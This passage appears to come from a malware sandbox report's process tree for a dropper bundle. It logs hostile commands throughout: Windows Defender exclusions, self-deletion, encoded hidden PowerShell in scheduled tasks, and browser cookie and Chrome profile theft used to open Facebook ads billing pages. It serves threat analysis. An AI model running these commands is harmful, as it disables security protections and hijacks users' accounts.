        "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\VR\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
        12⤵
        
        PID:6876
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im RunWW.exe /f
        13⤵
        Kills process with taskkill
        
        PID:6080
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        13⤵
        Delays execution with timeout.exe
        
        PID:4876
        
        C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe
        
        "C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"
        11⤵
        
        PID:5116
        
        C:\Program Files (x86)\VR\Versium Research\moSvKMEovuRx.exe
        
        "C:\Program Files (x86)\VR\Versium Research\moSvKMEovuRx.exe"
        11⤵
        
        PID:5508
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        12⤵
        
        PID:2400
        
        C:\Program Files (x86)\VR\Versium Research\22.exe
        
        "C:\Program Files (x86)\VR\Versium Research\22.exe"
        11⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
        12⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        13⤵
        
        PID:2888
        
        C:\Program Files (x86)\VR\Versium Research\RmSetp.exe
        
        "C:\Program Files (x86)\VR\Versium Research\RmSetp.exe"
        11⤵
        
        PID:5192
        
        C:\ProgramData\2945365.exe
        
        "C:\ProgramData\2945365.exe"
        12⤵
        
        PID:6376
        
        C:\ProgramData\1660466.exe
        
        "C:\ProgramData\1660466.exe"
        12⤵
        
        PID:5664
        
        C:\ProgramData\Windows Host\Windows Host.exe
        
        "C:\ProgramData\Windows Host\Windows Host.exe"
        13⤵
        
        PID:5732
        
        C:\Program Files (x86)\VR\Versium Research\lylal220.exe
        
        "C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
        11⤵
        
        PID:5332
        
        C:\Users\Admin\AppData\Local\Temp\is-KD9VB.tmp\lylal220.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-KD9VB.tmp\lylal220.tmp" /SL5="$304B0,491750,408064,C:\Program Files (x86)\VR\Versium Research\lylal220.exe"
        12⤵
        
        PID:576
        
        C:\Users\Admin\AppData\Local\Temp\is-LP0NU.tmp\Microsoft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-LP0NU.tmp\Microsoft.exe" /S /UID=lylal220
        13⤵
        
        PID:7048
        
        C:\Program Files\Microsoft Office\DVIJWPSRHC\irecord.exe
        
        "C:\Program Files\Microsoft Office\DVIJWPSRHC\irecord.exe" /VERYSILENT
        14⤵
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\is-MDJRF.tmp\irecord.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-MDJRF.tmp\irecord.tmp" /SL5="$205DA,6265333,408064,C:\Program Files\Microsoft Office\DVIJWPSRHC\irecord.exe" /VERYSILENT
        15⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\c1-abc27-28c-9e39d-7bbfd8b7b08c2\Hashavadyshae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c1-abc27-28c-9e39d-7bbfd8b7b08c2\Hashavadyshae.exe"
        14⤵
        
        PID:7012
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuhvn2gz.hsd\gaooo.exe & exit
        15⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\Temp\kuhvn2gz.hsd\gaooo.exe
        
        C:\Users\Admin\AppData\Local\Temp\kuhvn2gz.hsd\gaooo.exe
        16⤵
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        17⤵
        
        PID:7340
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        17⤵
        
        PID:7932
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkb15b4k.fef\md7_7dfj.exe & exit
        15⤵
        
        PID:7960
        
        C:\Users\Admin\AppData\Local\Temp\qkb15b4k.fef\md7_7dfj.exe
        
        C:\Users\Admin\AppData\Local\Temp\qkb15b4k.fef\md7_7dfj.exe
        16⤵
        
        PID:6124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kl1gn2a.nes\askinstall31.exe & exit
        15⤵
        
        PID:7780
        
        C:\Users\Admin\AppData\Local\Temp\0kl1gn2a.nes\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\0kl1gn2a.nes\askinstall31.exe
        16⤵
        
        PID:4540
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        17⤵
        
        PID:5468
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        18⤵
        Kills process with taskkill
        
        PID:7748
        
        C:\Windows\SysWOW64\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
        17⤵
        
        PID:2476
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
        17⤵
        
        PID:352
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,16581387764932533787,23782698754723501,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1616 /prefetch:8
        18⤵
        
        PID:7344
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1hmhnhwl.lcj\customer6.exe & exit
        15⤵
        
        PID:8116
        
        C:\Users\Admin\AppData\Local\Temp\1hmhnhwl.lcj\customer6.exe
        
        C:\Users\Admin\AppData\Local\Temp\1hmhnhwl.lcj\customer6.exe
        16⤵
        
        PID:6792
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"
        17⤵
        
        PID:3000
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mo40raok.z5o\HookSetp.exe & exit
        15⤵
        
        PID:7492
        
        C:\Users\Admin\AppData\Local\Temp\mo40raok.z5o\HookSetp.exe
        
        C:\Users\Admin\AppData\Local\Temp\mo40raok.z5o\HookSetp.exe
        16⤵
        
        PID:1876
        
        C:\ProgramData\4762684.exe
        
        "C:\ProgramData\4762684.exe"
        17⤵
        
        PID:7212
        
        C:\ProgramData\2977296.exe
        
        "C:\ProgramData\2977296.exe"
        17⤵
        
        PID:6436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe & exit
        15⤵
        
        PID:7704
        
        C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
        16⤵
        
        PID:5012
        
        C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\q3ag5ct3.qbp\privacytools5.exe
        17⤵
        
        PID:6696
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\luecfnoy.mus\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:2420
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cy1erdsk.cbs\19.exe & exit
        15⤵
        
        PID:7444
        
        C:\Users\Admin\AppData\Local\Temp\cy1erdsk.cbs\19.exe
        
        C:\Users\Admin\AppData\Local\Temp\cy1erdsk.cbs\19.exe
        16⤵
        
        PID:7468
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"
        17⤵
        
        PID:7184
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        18⤵
        
        PID:6776
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iukpqc3n.jyw\b9706c20.exe & exit
        15⤵
        
        PID:4380
        
        C:\Users\Admin\AppData\Local\Temp\iukpqc3n.jyw\b9706c20.exe
        
        C:\Users\Admin\AppData\Local\Temp\iukpqc3n.jyw\b9706c20.exe
        16⤵
        
        PID:3588
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wl2ffsyc.rcf\setup.exe /8-2222 & exit
        15⤵
        
        PID:7452
        
        C:\Users\Admin\AppData\Local\Temp\wl2ffsyc.rcf\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\wl2ffsyc.rcf\setup.exe /8-2222
        16⤵
        Checks computer location settings
        
        PID:900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Solitary-Leaf'
        17⤵
        
        PID:7944
        
        C:\Program Files (x86)\Solitary-Leaf\7za.exe
        
        "C:\Program Files (x86)\Solitary-Leaf\7za.exe" e -p154.61.71.13 winamp.7z
        17⤵
        
        PID:4852
        
        C:\Program Files (x86)\Solitary-Leaf\setup.exe
        
        "C:\Program Files (x86)\Solitary-Leaf\setup.exe" /8-2222
        17⤵
        
        PID:5252
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\roqpd0ni.yre\setup.exe /S /kr /site_id=754 & exit
        15⤵
        
        PID:7936
        
        C:\Users\Admin\AppData\Local\Temp\roqpd0ni.yre\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\roqpd0ni.yre\setup.exe /S /kr /site_id=754
        16⤵
        
        PID:1356
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        17⤵
        
        PID:7300
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        18⤵
        
        PID:6024
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        19⤵
        
        PID:5440
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        19⤵
        
        PID:8032
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gPvmhpTBx" /SC once /ST 17:23:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        17⤵
        Creates scheduled task(s)
        
        PID:6216
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gPvmhpTBx"
        17⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gPvmhpTBx"
        17⤵
        
        PID:8044
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 19:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\AOjWXva.exe\" 9n /site_id 754 /S" /V1 /F
        17⤵
        Creates scheduled task(s)
        
        PID:492
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11lmliky.xa5\Four.exe & exit
        15⤵
        
        PID:7888
        
        C:\Users\Admin\AppData\Local\Temp\11lmliky.xa5\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\11lmliky.xa5\Four.exe
        16⤵
        
        PID:4140
        
        C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        17⤵
        
        PID:5948
        
        C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe" 1 3.1616869590.605f78d65326f 104
        18⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WY3EMM0E2M\multitimer.exe" 2 3.1616869590.605f78d65326f
        19⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\4nzwrfcg5kq\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\4nzwrfcg5kq\vict.exe" /VERYSILENT /id=535
        20⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Local\Temp\is-CEE06.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CEE06.tmp\vict.tmp" /SL5="$20394,870426,780800,C:\Users\Admin\AppData\Local\Temp\4nzwrfcg5kq\vict.exe" /VERYSILENT /id=535
        21⤵
        
        PID:5288
        
        C:\Users\Admin\AppData\Local\Temp\is-KAEPO.tmp\winhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KAEPO.tmp\winhost.exe" 535
        22⤵
        
        PID:3460
        
        C:\Users\Admin\AppData\Local\Temp\1dqpxxrttff\AwesomePoolU1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1dqpxxrttff\AwesomePoolU1.exe"
        20⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\1543m2b3uct\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1543m2b3uct\Setup3310.exe" /Verysilent /subid=577
        20⤵
        
        PID:6036
        
        C:\Users\Admin\AppData\Local\Temp\is-S3JBI.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-S3JBI.tmp\Setup3310.tmp" /SL5="$303A6,138429,56832,C:\Users\Admin\AppData\Local\Temp\1543m2b3uct\Setup3310.exe" /Verysilent /subid=577
        21⤵
        
        PID:7568
        
        C:\Users\Admin\AppData\Local\Temp\is-J8TPQ.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-J8TPQ.tmp\Setup.exe" /Verysilent
        22⤵
        
        PID:6268
        
        C:\Users\Admin\AppData\Local\Temp\3ps33h4ns5x\qyyxvoqvedl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3ps33h4ns5x\qyyxvoqvedl.exe" /ustwo INSTALL
        20⤵
        
        PID:7360
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 652
        21⤵
        Program crash
        
        PID:3424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 664
        21⤵
        Program crash
        
        PID:3648
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 620
        21⤵
        Program crash
        
        PID:5364
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 816
        21⤵
        Program crash
        
        PID:8080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 872
        21⤵
        Program crash
        
        PID:7508
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 840
        21⤵
        Program crash
        
        PID:6084
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 1148
        21⤵
        Program crash
        
        PID:8832
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7360 -s 1080
        21⤵
        Program crash
        
        PID:9172
        
        C:\Users\Admin\AppData\Local\Temp\vktcq5pke2e\rsxjyxbozpl.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vktcq5pke2e\rsxjyxbozpl.exe" /1-610
        20⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Purple-Fire'
        21⤵
        
        PID:5404
        
        C:\Program Files (x86)\Purple-Fire\7za.exe
        
        "C:\Program Files (x86)\Purple-Fire\7za.exe" e -p154.61.71.13 winamp.7z
        21⤵
        
        PID:8680
        
        C:\Program Files (x86)\Purple-Fire\rsxjyxbozpl.exe
        
        "C:\Program Files (x86)\Purple-Fire\rsxjyxbozpl.exe" /1-610
        21⤵
        
        PID:5968
        
        C:\Users\Admin\AppData\Local\Temp\k23mpf51elp\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\k23mpf51elp\app.exe" /8-23
        20⤵
        
        PID:5760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Summer-Shadow'
        21⤵
        
        PID:3720
        
        C:\Program Files (x86)\Summer-Shadow\7za.exe
        
        "C:\Program Files (x86)\Summer-Shadow\7za.exe" e -p154.61.71.13 winamp.7z
        21⤵
        
        PID:1164
        
        C:\Program Files (x86)\Summer-Shadow\app.exe
        
        "C:\Program Files (x86)\Summer-Shadow\app.exe" /8-23
        21⤵
        
        PID:9852
        
        C:\Users\Admin\AppData\Local\Temp\KXO81WCCDN\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\KXO81WCCDN\setups.exe" ll
        17⤵
        
        PID:2296
        
        C:\Users\Admin\AppData\Local\Temp\is-P24K2.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-P24K2.tmp\setups.tmp" /SL5="$60364,408070,216064,C:\Users\Admin\AppData\Local\Temp\KXO81WCCDN\setups.exe" ll
        18⤵
        
        PID:4080
        
        C:\Users\Admin\AppData\Local\Temp\c4-f55f0-4c7-4f1ad-9d07b36d9fc0c\Rucyvawyvo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c4-f55f0-4c7-4f1ad-9d07b36d9fc0c\Rucyvawyvo.exe"
        14⤵
        
        PID:4152
        
        C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe
        
        "C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
        11⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\is-46TJ9.tmp\LabPicV3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-46TJ9.tmp\LabPicV3.tmp" /SL5="$30608,239334,155648,C:\Program Files (x86)\VR\Versium Research\LabPicV3.exe"
        12⤵
        
        PID:5632
        
        C:\Users\Admin\AppData\Local\Temp\is-OPDGN.tmp\ppppppfy.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-OPDGN.tmp\ppppppfy.exe" /S /UID=lab214
        13⤵
        
        PID:6216
        
        C:\Program Files\Windows Security\AVINCMPXZD\prolab.exe
        
        "C:\Program Files\Windows Security\AVINCMPXZD\prolab.exe" /VERYSILENT
        14⤵
        
        PID:732
        
        C:\Users\Admin\AppData\Local\Temp\is-3I39D.tmp\prolab.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3I39D.tmp\prolab.tmp" /SL5="$405D6,575243,216576,C:\Program Files\Windows Security\AVINCMPXZD\prolab.exe" /VERYSILENT
        15⤵
        
        PID:6336
        
        C:\Users\Admin\AppData\Local\Temp\9d-324e4-677-e8a88-17b39cb25c043\Cyxaedaqaeshu.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9d-324e4-677-e8a88-17b39cb25c043\Cyxaedaqaeshu.exe"
        14⤵
        
        PID:5060
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hb4jfpyd.z3d\gaooo.exe & exit
        15⤵
        
        PID:7080
        
        C:\Users\Admin\AppData\Local\Temp\hb4jfpyd.z3d\gaooo.exe
        
        C:\Users\Admin\AppData\Local\Temp\hb4jfpyd.z3d\gaooo.exe
        16⤵
        
        PID:7624
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        17⤵
        
        PID:7352
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        17⤵
        
        PID:7836
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b3fybgnm.e3d\md7_7dfj.exe & exit
        15⤵
        
        PID:7620
        
        C:\Users\Admin\AppData\Local\Temp\b3fybgnm.e3d\md7_7dfj.exe
        
        C:\Users\Admin\AppData\Local\Temp\b3fybgnm.e3d\md7_7dfj.exe
        16⤵
        
        PID:7824
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\esbeka31.343\askinstall31.exe & exit
        15⤵
        
        PID:8044
        
        C:\Users\Admin\AppData\Local\Temp\esbeka31.343\askinstall31.exe
        
        C:\Users\Admin\AppData\Local\Temp\esbeka31.343\askinstall31.exe
        16⤵
        
        PID:188
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ksa212bw.tjz\customer6.exe & exit
        15⤵
        
        PID:7380
        
        C:\Users\Admin\AppData\Local\Temp\ksa212bw.tjz\customer6.exe
        
        C:\Users\Admin\AppData\Local\Temp\ksa212bw.tjz\customer6.exe
        16⤵
        
        PID:6340
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"
        17⤵
        
        PID:1120
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3u4ohjkb.efe\HookSetp.exe & exit
        15⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\3u4ohjkb.efe\HookSetp.exe
        
        C:\Users\Admin\AppData\Local\Temp\3u4ohjkb.efe\HookSetp.exe
        16⤵
        
        PID:7532
        
        C:\ProgramData\5176678.exe
        
        "C:\ProgramData\5176678.exe"
        17⤵
        
        PID:6560
        
        C:\ProgramData\2136092.exe
        
        "C:\ProgramData\2136092.exe"
        17⤵
        
        PID:6740
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe & exit
        15⤵
        
        PID:8024
        
        C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
        16⤵
        
        PID:2064
        
        C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
        
        C:\Users\Admin\AppData\Local\Temp\5bikp5ap.l4w\privacytools5.exe
        17⤵
        
        PID:1536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yx3nquwg.xp0\GcleanerWW.exe /mixone & exit
        15⤵
        
        PID:7608
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yqqjp0ka.zm1\19.exe & exit
        15⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\yqqjp0ka.zm1\19.exe
        
        C:\Users\Admin\AppData\Local\Temp\yqqjp0ka.zm1\19.exe
        16⤵
        
        PID:7692
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"
        17⤵
        
        PID:6260
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
        18⤵
        
        PID:4208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\or0ul2yi.xfm\b9706c20.exe & exit
        15⤵
        
        PID:7724
        
        C:\Users\Admin\AppData\Local\Temp\or0ul2yi.xfm\b9706c20.exe
        
        C:\Users\Admin\AppData\Local\Temp\or0ul2yi.xfm\b9706c20.exe
        16⤵
        
        PID:6180
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tofjnhxb.1r5\setup.exe /8-2222 & exit
        15⤵
        
        PID:7876
        
        C:\Users\Admin\AppData\Local\Temp\tofjnhxb.1r5\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\tofjnhxb.1r5\setup.exe /8-2222
        16⤵
        
        PID:2764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Wandering-Glade'
        17⤵
        
        PID:5132
        
        C:\Program Files (x86)\Wandering-Glade\7za.exe
        
        "C:\Program Files (x86)\Wandering-Glade\7za.exe" e -p154.61.71.13 winamp.7z
        17⤵
        
        PID:5092
        
        C:\Program Files (x86)\Wandering-Glade\setup.exe
        
        "C:\Program Files (x86)\Wandering-Glade\setup.exe" /8-2222
        17⤵
        
        PID:5576
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hxxd35bo.dep\setup.exe /S /kr /site_id=754 & exit
        15⤵
        
        PID:5800
        
        C:\Users\Admin\AppData\Local\Temp\hxxd35bo.dep\setup.exe
        
        C:\Users\Admin\AppData\Local\Temp\hxxd35bo.dep\setup.exe /S /kr /site_id=754
        16⤵
        
        PID:396
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        17⤵
        
        PID:7176
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        18⤵
        
        PID:7708
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        19⤵
        
        PID:6092
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
